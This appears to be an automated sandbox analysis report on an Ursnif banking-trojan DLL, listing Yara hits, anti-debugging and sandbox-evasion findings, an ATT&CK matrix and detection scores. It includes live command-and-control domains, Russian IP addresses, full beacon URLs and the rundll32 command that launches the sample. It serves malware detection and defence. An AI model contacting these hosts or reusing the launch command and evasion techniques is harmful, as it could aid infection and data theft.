                  Source: Yara matchFile source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara matchFile source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
                  Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

                  Anti Debugging

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100015BD LoadLibraryA,GetProcAddress,

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.173.145.183 80
                  Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: onlinetwork.top
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.44.194 80
                  Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: linetwork.top
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF54EC cpuid
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001C65 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000204A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara matchFile source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
                  Source: Yara matchFile source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  Exfiltration Over Other Network Medium2
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                  Data Encrypted for Impact
                  Default Accounts12
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  111
                  Process Injection
                  LSASS Memory11
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager1
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Regsvr32
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput CaptureScheduled Transfer12
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Rundll32
                  LSA Secrets1
                  Account Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  System Owner/User Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
                  System Information Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 727158 Sample: ursnif_IAT_corrected.exe.dll Startdate: 21/10/2022 Architecture: WINDOWS Score: 100 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 4 other signatures 2->45 7 loaddll32.exe 7 2->7         started        process3 dnsIp4 29 onlinetwork.top 7->29 31 linetwork.top 7->31 33 192.168.2.1 unknown unknown 7->33 49 Found evasive API chain (may stop execution after checking system information) 7->49 51 Found API chain indicative of debugger detection 7->51 53 Writes or reads registry keys via WMI 7->53 55 Writes registry values via WMI 7->55 11 regsvr32.exe 6 7->11         started        15 cmd.exe 1 7->15         started        17 rundll32.exe 6 7->17         started        19 conhost.exe 7->19         started        signatures5 process6 dnsIp7 57 System process connects to network (likely due to code injection or exploit) 11->57 59 Writes or reads registry keys via WMI 11->59 61 Writes registry values via WMI 11->61 21 rundll32.exe 6 15->21         started        35 linetwork.top 62.173.145.183, 49742, 49743, 49744 SPACENET-ASInternetServiceProviderRU Russian Federation 17->35 37 onlinetwork.top 31.41.44.194, 80 ASRELINKRU Russian Federation 17->37 signatures8 process9 dnsIp10 25 onlinetwork.top 21->25 27 linetwork.top 21->27 47 Writes registry values via WMI 21->47 signatures11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  ursnif_IAT_corrected.exe.dll56%VirustotalBrowse
                  ursnif_IAT_corrected.exe.dll100%AviraTR/Spy.Gen
                  ursnif_IAT_corrected.exe.dll100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLinkDownload
                  0.2.loaddll32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.loaddll32.exe.7f0000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                  3.2.regsvr32.exe.2af0000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                  5.2.rundll32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  5.2.rundll32.exe.45e0000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                  4.2.rundll32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  4.2.rundll32.exe.2e30000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                  3.2.regsvr32.exe.10000000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  SourceDetectionScannerLabelLink
                  linetwork.top12%VirustotalBrowse
                  onlinetwork.top12%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk0%Avira URL Cloudsafe
                  http://onlinetwork.top/)0%Avira URL Cloudsafe
                  http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv70%Avira URL Cloudsafe
                  http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo0%Avira URL Cloudsafe
                  http://onlinetwork.top/12%VirustotalBrowse
                  http://onlinetwork.top/0%Avira URL Cloudsafe
                  http://onlinetwork.top/M0%Avira URL Cloudsafe
                  http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K0%Avira URL Cloudsafe
                  http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/0%Avira URL Cloudsafe
                  http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR0%Avira URL Cloudsafe
                  http://linetwork.top/drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk0%Avira URL Cloudsafe
